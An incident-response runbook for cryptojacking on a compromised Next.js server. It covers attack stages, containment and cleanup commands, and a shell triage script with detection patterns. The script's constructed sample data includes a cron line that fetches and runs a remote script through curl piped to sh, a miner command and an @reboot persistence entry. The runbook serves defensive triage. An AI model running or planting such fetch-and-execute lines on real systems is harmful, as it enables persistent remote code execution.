
INCIDENT_RESPONSE: RCE & CRYPTOJACKING

SCENARIO: CPU pegged at 100%. Malicious binaries (xmrig, kdevtmpfsi) or unexpected .php scripts are found in project directories.

PHASE 1 Anatomy of the Attack

Stage | Action | Purpose
1. Entry | Exploit vulnerability | Uses a flaw (e.g. the Next.js RSC bug) to execute curl or wget on the server.
2. Payload | Download miner | The server fetches xmrig and a config.json.
3. Persistence | Install backdoor | Creates cron jobs or web shells so the miner is restarted automatically.
4. Execution | Start mining | The server mines Monero, exhausting its CPU.

PHASE 2 Identification & Containment

Stop the "heartbeat" of the attack and clear the re-infection loop.

# 1. Stop the CPU drain: find the miner PIDs, then kill them
ps aux | grep -E 'xmrig|kdevtmpfsi'
sudo kill -9 [PID]
# kill -9 stops the process but not whatever respawns it; step 2 finds that.

# 2. Check for persistence (the re-infection loop)
crontab -l
# Look for suspicious URLs/scripts (curl/wget, /tmp, base64). Use 'crontab -e' to purge.
# crontab -l only lists the current user's jobs; also check root's crontab, /etc/crontab and /etc/cron.d.

PHASE 3 Remediation (Clean Room)

Compare the deployed tree against git and rotate all secrets: anything readable by the compromised process (.env files, API keys, database credentials) must be treated as exposed.

# Check for untracked malicious files (untracked entries show as ??);
# also review modified tracked files, since a backdoor can be appended to an existing one
git status

# Update Next.js to safe versions:
# Safe: 15.x.x | 14.2.11+ | 13.5.7+
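The three checks above (miner processes, cron persistence, untracked drop-ins) as one triage script, added here as an example and not part of the original runbook. It assumes the process names and file patterns from the signature table below; the sample ps, crontab and git output is constructed, not captured from a real host.

```shell
#!/bin/sh
# Triage helper for the indicators in this runbook. Each function reads text on
# stdin, so it works on live output (ps aux, crontab -l, git status --porcelain)
# or on copies saved from the compromised host.

# Process names from the signature table.
MINER_PATTERN='xmrig|kdevtmpfsi'
# Cron lines that download from a URL or run out of world-writable temp
# dirs are the re-infection loop from phase 2.
CRON_PATTERN='curl |wget |base64 |/tmp/|/dev/shm/'

# Lines of ps aux whose command (field 11) is a known miner; the grep that
# found it is ignored because its command field is "grep".
find_miner_processes() {
    awk -v pat="$MINER_PATTERN" '$11 ~ pat'
}

# Non-comment crontab lines matching the re-infection patterns.
find_suspicious_cron() {
    awk -v pat="$CRON_PATTERN" '$0 !~ /^[ \t]*#/ && $0 ~ pat'
}

# Untracked (??) git entries that match the signature table: PHP or
# shell.py drop-ins, and hidden directories.
find_untracked_dropins() {
    awk '$1 == "??" && ($2 ~ "[.]php$" || $2 ~ "shell[.]py$" || $2 ~ "(^|/)[.][^/]+/$")'
}

# Constructed sample data (not captured from a real host) for a dry run.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1 2 ? Ss 10:00 0:00 /sbin/init
www-data 4242 99.7 2.3 3 4 ? R 10:05 45:10 /tmp/xmrig -o pool.example:3333
www-data 4300 97.1 1.0 5 6 ? R 10:06 40:02 /tmp/kdevtmpfsi
me 5000 0.0 0.0 7 8 pts/0 S+ 10:10 0:00 grep xmrig'
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew
*/5 * * * * curl -fsSL http://198.51.100.10/x.sh | sh
@reboot /dev/shm/.c/start.sh'
SAMPLE_GIT='?? public/uploads/shell.php
 M package.json
?? .cache_sys/
?? scripts/shell.py
?? README.new'

echo "== miner processes ==";    printf '%s\n' "$SAMPLE_PS"   | find_miner_processes
echo "== suspicious cron ==";    printf '%s\n' "$SAMPLE_CRON" | find_suspicious_cron
echo "== untracked drop-ins =="; printf '%s\n' "$SAMPLE_GIT"  | find_untracked_dropins
```

On a live host replace the sample feeds with `ps aux | find_miner_processes`, `crontab -l | find_suspicious_cron` and `git status --porcelain | find_untracked_dropins`.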

PHASE 4 Prevention Checklist

Auto-Updates: Use Dependabot for high-severity CVEs.
WAF: Use Cloudflare/Vercel firewall to block RCE patterns.
Least Privilege: Never run Next.js as root.
Read-Only FS: Use read-only Docker containers where possible.

Summary: Malicious File Signatures

File Name | Type | Threat
xmrig / kdevtmpfsi | Binary | Critical: crypto miner
*.php / shell.py | Script | Critical: remote backdoor
.hidden_folder | Directory | Medium: hides malicious assets